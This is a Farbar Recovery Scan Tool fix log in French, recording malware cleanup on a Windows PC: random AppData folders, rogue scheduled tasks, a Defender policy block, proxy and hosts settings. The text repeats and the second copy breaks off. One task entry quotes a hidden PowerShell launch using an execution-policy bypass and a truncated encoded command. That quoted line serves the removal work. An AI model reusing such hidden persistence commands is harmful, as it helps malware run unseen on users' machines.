Publicité
Publicité
Format du document : text/plain
Prévisualisation
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 15-06-2017
Exécuté par LYDIE (15-06-2017 13:50:13) Run:1
Exécuté depuis C:\Users\LYDIE\Desktop
Profils chargés: LYDIE (Profils disponibles: LYDIE)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
start
CreateRestorePoint:
CloseProcesses:
GroupPolicy: Restriction - Windows Defender <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
CHR dev: Chrome dev build d�tect�(e)! <======= ATTENTION
S2 AdBlockerService; C:\Program Files (x86)\AdBlocker\AdBlockerService.exe [110080 2017-04-11] (Star Line) [Fichier non sign�]
C:\Program Files (x86)\AdBlocker
2017-06-08 20:03 - 2017-06-08 20:03 - 00003046 _____ C:\WINDOWS\System32\Tasks\QMPVCBFUEWAKKBHA
2017-06-08 20:03 - 2017-06-08 20:03 - 00002184 _____ C:\WINDOWS\System32\Tasks\H9pNxeThzq
2017-06-08 13:01 - 2017-06-08 13:01 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\nt4ko0ollyg
2017-06-08 13:01 - 2017-06-08 13:01 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\nrsksjwgeew
2017-06-08 13:01 - 2017-06-08 13:01 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\d4evwa2u15y
2017-06-08 12:50 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\cfadvicyrzq
2017-06-08 12:50 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\1bl5lq3m1p4
2017-06-08 12:33 - 2017-06-08 12:33 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
2017-06-08 12:33 - 2017-06-08 12:33 - 00000000 ____D C:\Users\Default User\AppData\Local\AdvinstAnalytics
2017-06-08 12:31 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\gyafhg0oair
2017-06-08 12:31 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\dvoesanod35
2017-06-08 12:22 - 2017-06-08 13:15 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\UCChannel
2017-06-08 12:19 - 2017-06-08 13:44 - 00000000 ____D C:\Users\LYDIE\AppData\Local\AdvinstAnalytics
2017-06-08 12:19 - 2017-06-08 13:13 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\devnull
2017-06-08 12:19 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\zf1hqlfvyr5
2017-06-08 12:19 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\oiqt452gkym
2017-06-08 12:18 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\zjzhouonbhy
2017-06-08 12:18 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\tgv2cerhin1
2017-06-08 11:45 - 2017-06-08 11:45 - 0004962 _____ () C:\ProgramData\cgbpfizu.hkv
2017-06-08 11:56 - 2017-06-08 11:56 - 0005111 _____ () C:\ProgramData\czchsjpj.srw
2017-06-08 11:45 - 2017-06-08 11:45 - 0000016 _____ () C:\ProgramData\mntemp
2017-06-08 12:19 - 2017-06-08 12:19 - 0140800 _____ () C:\Users\LYDIE\AppData\Local\installer.dat
Task: {021ABAF5-9D83-40BA-84B4-63624A9716B7} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Pas de fichier <==== ATTENTION
Task: {04341329-D787-44B1-BC31-C15E79754359} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier <==== ATTENTION
Task: {0552F571-4217-4463-B582-A1CFCA2E03C7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Pas de fichier <==== ATTENTION
Task: {210DCECD-2BBE-4DB1-887B-E08070DC0277} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Pas de fichier <==== ATTENTION
Task: {4D2229F6-9057-4554-96BB-638D2B3413F2} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Pas de fichier <==== ATTENTION
Task: {4E88D496-CC54-4A3C-A90F-14DBBC6102D9} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Pas de fichier <==== ATTENTION
Task: {87312B8B-C515-48BA-91C7-C22B22EC19AD} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Pas de fichier <==== ATTENTION
Task: {87A1F38C-D9AB-4461-9B37-2C8FC7BDD45F} - System32\Tasks\TMUDLO1 => C:\ProgramData\TomorrowGames\TomorrowGames.exe <==== ATTENTION
Task: {8CAC4934-4860-45C9-B0C0-C73B6E009D1F} - System32\Tasks\H9pNxeThzq => C:\Program Files (x86)\hROcUaWB3D\updengine.exe [2017-06-07] () <==== ATTENTION Task: {C5E467E6-F537-472C-9184-3B2265938E87} - \WPD\SqmUpload_S-1-5-21-898736392-941528643-2870755839-1001 -> Pas de fichier <==== ATTENTION
Task: {C67EFBA8-EBDC-43B4-A63F-31CE3EEDCCEE} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Pas de fichier <==== ATTENTION
Task: {CDF7C605-8044-4D53-9DD8-23B221AAD9A7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Pas de fichier <==== ATTENTION
Task: {CE11AE79-08AA-451D-B19C-48701C736423} - System32\Tasks\{0F090E47-0B0A-0E78-0A11-78090E7A110A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAIAAgACAAIAAgADsAIAA7ADsAOwA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUA (l'�l�ment de donn�es a 10080 caract�res en plus). <==== ATTENTION
Task: {DB737CB4-5266-49CB-94E8-944E42EFC0BD} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier <==== ATTENTION
Task: {E6F99E49-200A-4ACE-94EE-E4AB2B93064D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Pas de fichier <==== ATTENTION
Task: {EE69D39D-FB48-483D-8722-BA12437EC025} - System32\Tasks\QMPVCBFUEWAKKBHA => C:\ProgramData\Service1104\Service1104.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\QMPVCBFUEWAKKBHA.job => C:\ProgramData\Service1104\Service1104.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\TMUDLO1.job => C:\ProgramData\TomorrowGames\TomorrowGames.exe <==== ATTENTION
RemoveProxy:
Hosts:
EmptyTemp:
end
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
C:\WINDOWS\system32\GroupPolicy\Machine => déplacé(es) avec succès
C:\WINDOWS\system32\GroupPolicy\GPT.ini => déplacé(es) avec succès
HKLM\SOFTWARE\Policies\Google => clé supprimé(es) avec succès
CHR dev: Chrome dev build détecté(e)! <======= ATTENTION => Erreur: Pas de correction automatique trouvée pour cet élément.
AdBlockerService => service non trouvé(e).
"C:\Program Files (x86)\AdBlocker" => non trouvé(e).
"C:\WINDOWS\System32\Tasks\QMPVCBFUEWAKKBHA" => non trouvé(e).
C:\WINDOWS\System32\Tasks\H9pNxeThzq => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\nt4ko0ollyg => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\nrsksjwgeew => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\d4evwa2u15y => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\cfadvicyrzq => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\1bl5lq3m1p4 => déplacé(es) avec succès
C:\Users\Default\AppData\Local\AdvinstAnalytics => déplacé(es) avec succès
"C:\Users\Default User\AppData\Local\AdvinstAnalytics" => non trouvé(e).
C:\Users\LYDIE\AppData\Roaming\gyafhg0oair => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\dvoesanod35 => déplacé(es) avec succès
"C:\Users\LYDIE\AppData\Roaming\UCChannel" => non trouvé(e).
C:\Users\LYDIE\AppData\Local\AdvinstAnalytics => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\devnull => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\zf1hqlfvyr5 => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\oiqt452gkym => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\zjzhouonbhy => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\tgv2cerhin1 => déplacé(es) avec succès
C:\ProgramData\cgbpfizu.hkv => déplacé(es) avec succès
C:\ProgramData\czchsjpj.srw => déplacé(es) avec succès
C:\ProgramData\mntemp => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Local\installer.dat => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{021ABAF5-9D83-40BA-84B4-63624A9716B7} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{021ABAF5-9D83-40BA-84B4-63624A9716B7} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{04341329-D787-44B1-BC31-C15E79754359} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04341329-D787-44B1-BC31-C15E79754359} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0552F571-4217-4463-B582-A1CFCA2E03C7} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0552F571-4217-4463-B582-A1CFCA2E03C7} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{210DCECD-2BBE-4DB1-887B-E08070DC0277} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{210DCECD-2BBE-4DB1-887B-E08070DC0277} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4D2229F6-9057-4554-96BB-638D2B3413F2} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4D2229F6-9057-4554-96BB-638D2B3413F2} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4E88D496-CC54-4A3C-A90F-14DBBC6102D9} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4E88D496-CC54-4A3C-A90F-14DBBC6102D9} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{87312B8B-C515-48BA-91C7-C22B22EC19AD} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{87312B8B-C515-48BA-91C7-C22B22EC19AD} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{87A1F38C-D9AB-4461-9B37-2C8FC7BDD45F} => clé non trouvé(e).
C:\WINDOWS\System32\Tasks\TMUDLO1 => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TMUDLO1 => clé non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8CAC4934-4860-45C9-B0C0-C73B6E009D1F} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8CAC4934-4860-45C9-B0C0-C73B6E009D1F} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\H9pNxeThzq => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\H9pNxeThzq => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C67EFBA8-EBDC-43B4-A63F-31CE3EEDCCEE} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C67EFBA8-EBDC-43B4-A63F-31CE3EEDCCEE} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CDF7C605-8044-4D53-9DD8-23B221AAD9A7} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CDF7C605-8044-4D53-9DD8-23B221AAD9A7} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CE11AE79-08AA-451D-B19C-48701C736423} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CE11AE79-08AA-451D-B19C-48701C736423} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\{0F090E47-0B0A-0E78-0A11-78090E7A110A} => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0F090E47-0B0A-0E78-0A11-78090E7A110A} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DB737CB4-5266-49CB-94E8-944E42EFC0BD} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DB737CB4-5266-49CB-94E8-944E42EFC0BD} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E6F99E49-200A-4ACE-94EE-E4AB2B93064D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E6F99E49-200A-4ACE-94EE-E4AB2B93064D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EE69D39D-FB48-483D-8722-BA12437EC025} => clé non trouvé(e).
C:\WINDOWS\System32\Tasks\QMPVCBFUEWAKKBHA => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\QMPVCBFUEWAKKBHA => clé non trouvé(e).
C:\WINDOWS\Tasks\QMPVCBFUEWAKKBHA.job => non trouvé(e).
C:\WINDOWS\Tasks\TMUDLO1.job => non trouvé(e).
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-898736392-941528643-2870755839-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-898736392-941528643-2870755839-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
=========== EmptyTemp: ==========
BITS transfer queue => 6053888 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 306955926 B
Java, Flash, Steam htmlcache => 15557 B
Windows/system/drivers => 1379228 B
Edge => 9265296 B
Chrome => 0 B
Firefox => 398533502 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 128 B
LocalService => 2486 B
NetworkService => 982440 B
LYDIE => 41754943 B
RecycleBin => 3832775429 B
EmptyTemp: => 4.3 GB données temporaires supprimées.
================================
Le système a dû redémarrer.
==== Fin de Fixlog 13:53:56 ====
Exécuté par LYDIE (15-06-2017 13:50:13) Run:1
Exécuté depuis C:\Users\LYDIE\Desktop
Profils chargés: LYDIE (Profils disponibles: LYDIE)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
*****************
start
CreateRestorePoint:
CloseProcesses:
GroupPolicy: Restriction - Windows Defender <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
CHR dev: Chrome dev build d�tect�(e)! <======= ATTENTION
S2 AdBlockerService; C:\Program Files (x86)\AdBlocker\AdBlockerService.exe [110080 2017-04-11] (Star Line) [Fichier non sign�]
C:\Program Files (x86)\AdBlocker
2017-06-08 20:03 - 2017-06-08 20:03 - 00003046 _____ C:\WINDOWS\System32\Tasks\QMPVCBFUEWAKKBHA
2017-06-08 20:03 - 2017-06-08 20:03 - 00002184 _____ C:\WINDOWS\System32\Tasks\H9pNxeThzq
2017-06-08 13:01 - 2017-06-08 13:01 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\nt4ko0ollyg
2017-06-08 13:01 - 2017-06-08 13:01 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\nrsksjwgeew
2017-06-08 13:01 - 2017-06-08 13:01 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\d4evwa2u15y
2017-06-08 12:50 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\cfadvicyrzq
2017-06-08 12:50 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\1bl5lq3m1p4
2017-06-08 12:33 - 2017-06-08 12:33 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
2017-06-08 12:33 - 2017-06-08 12:33 - 00000000 ____D C:\Users\Default User\AppData\Local\AdvinstAnalytics
2017-06-08 12:31 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\gyafhg0oair
2017-06-08 12:31 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\dvoesanod35
2017-06-08 12:22 - 2017-06-08 13:15 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\UCChannel
2017-06-08 12:19 - 2017-06-08 13:44 - 00000000 ____D C:\Users\LYDIE\AppData\Local\AdvinstAnalytics
2017-06-08 12:19 - 2017-06-08 13:13 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\devnull
2017-06-08 12:19 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\zf1hqlfvyr5
2017-06-08 12:19 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\oiqt452gkym
2017-06-08 12:18 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\zjzhouonbhy
2017-06-08 12:18 - 2017-06-08 13:02 - 00000000 ____D C:\Users\LYDIE\AppData\Roaming\tgv2cerhin1
2017-06-08 11:45 - 2017-06-08 11:45 - 0004962 _____ () C:\ProgramData\cgbpfizu.hkv
2017-06-08 11:56 - 2017-06-08 11:56 - 0005111 _____ () C:\ProgramData\czchsjpj.srw
2017-06-08 11:45 - 2017-06-08 11:45 - 0000016 _____ () C:\ProgramData\mntemp
2017-06-08 12:19 - 2017-06-08 12:19 - 0140800 _____ () C:\Users\LYDIE\AppData\Local\installer.dat
Task: {021ABAF5-9D83-40BA-84B4-63624A9716B7} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Pas de fichier <==== ATTENTION
Task: {04341329-D787-44B1-BC31-C15E79754359} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Pas de fichier <==== ATTENTION
Task: {0552F571-4217-4463-B582-A1CFCA2E03C7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Pas de fichier <==== ATTENTION
Task: {210DCECD-2BBE-4DB1-887B-E08070DC0277} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Pas de fichier <==== ATTENTION
Task: {4D2229F6-9057-4554-96BB-638D2B3413F2} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Pas de fichier <==== ATTENTION
Task: {4E88D496-CC54-4A3C-A90F-14DBBC6102D9} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Pas de fichier <==== ATTENTION
Task: {87312B8B-C515-48BA-91C7-C22B22EC19AD} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Pas de fichier <==== ATTENTION
Task: {87A1F38C-D9AB-4461-9B37-2C8FC7BDD45F} - System32\Tasks\TMUDLO1 => C:\ProgramData\TomorrowGames\TomorrowGames.exe <==== ATTENTION
Task: {8CAC4934-4860-45C9-B0C0-C73B6E009D1F} - System32\Tasks\H9pNxeThzq => C:\Program Files (x86)\hROcUaWB3D\updengine.exe [2017-06-07] () <==== ATTENTION Task: {C5E467E6-F537-472C-9184-3B2265938E87} - \WPD\SqmUpload_S-1-5-21-898736392-941528643-2870755839-1001 -> Pas de fichier <==== ATTENTION
Task: {C67EFBA8-EBDC-43B4-A63F-31CE3EEDCCEE} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Pas de fichier <==== ATTENTION
Task: {CDF7C605-8044-4D53-9DD8-23B221AAD9A7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Pas de fichier <==== ATTENTION
Task: {CE11AE79-08AA-451D-B19C-48701C736423} - System32\Tasks\{0F090E47-0B0A-0E78-0A11-78090E7A110A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAIAAgACAAIAAgADsAIAA7ADsAOwA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUA (l'�l�ment de donn�es a 10080 caract�res en plus). <==== ATTENTION
Task: {DB737CB4-5266-49CB-94E8-944E42EFC0BD} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Pas de fichier <==== ATTENTION
Task: {E6F99E49-200A-4ACE-94EE-E4AB2B93064D} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Pas de fichier <==== ATTENTION
Task: {EE69D39D-FB48-483D-8722-BA12437EC025} - System32\Tasks\QMPVCBFUEWAKKBHA => C:\ProgramData\Service1104\Service1104.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\QMPVCBFUEWAKKBHA.job => C:\ProgramData\Service1104\Service1104.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\TMUDLO1.job => C:\ProgramData\TomorrowGames\TomorrowGames.exe <==== ATTENTION
RemoveProxy:
Hosts:
EmptyTemp:
end
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
C:\WINDOWS\system32\GroupPolicy\Machine => déplacé(es) avec succès
C:\WINDOWS\system32\GroupPolicy\GPT.ini => déplacé(es) avec succès
HKLM\SOFTWARE\Policies\Google => clé supprimé(es) avec succès
CHR dev: Chrome dev build détecté(e)! <======= ATTENTION => Erreur: Pas de correction automatique trouvée pour cet élément.
AdBlockerService => service non trouvé(e).
"C:\Program Files (x86)\AdBlocker" => non trouvé(e).
"C:\WINDOWS\System32\Tasks\QMPVCBFUEWAKKBHA" => non trouvé(e).
C:\WINDOWS\System32\Tasks\H9pNxeThzq => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\nt4ko0ollyg => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\nrsksjwgeew => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\d4evwa2u15y => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\cfadvicyrzq => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\1bl5lq3m1p4 => déplacé(es) avec succès
C:\Users\Default\AppData\Local\AdvinstAnalytics => déplacé(es) avec succès
"C:\Users\Default User\AppData\Local\AdvinstAnalytics" => non trouvé(e).
C:\Users\LYDIE\AppData\Roaming\gyafhg0oair => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\dvoesanod35 => déplacé(es) avec succès
"C:\Users\LYDIE\AppData\Roaming\UCChannel" => non trouvé(e).
C:\Users\LYDIE\AppData\Local\AdvinstAnalytics => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\devnull => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\zf1hqlfvyr5 => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\oiqt452gkym => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\zjzhouonbhy => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Roaming\tgv2cerhin1 => déplacé(es) avec succès
C:\ProgramData\cgbpfizu.hkv => déplacé(es) avec succès
C:\ProgramData\czchsjpj.srw => déplacé(es) avec succès
C:\ProgramData\mntemp => déplacé(es) avec succès
C:\Users\LYDIE\AppData\Local\installer.dat => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{021ABAF5-9D83-40BA-84B4-63624A9716B7} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{021ABAF5-9D83-40BA-84B4-63624A9716B7} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{04341329-D787-44B1-BC31-C15E79754359} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{04341329-D787-44B1-BC31-C15E79754359} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0552F571-4217-4463-B582-A1CFCA2E03C7} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0552F571-4217-4463-B582-A1CFCA2E03C7} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd => clé supprimé(es) avec succès
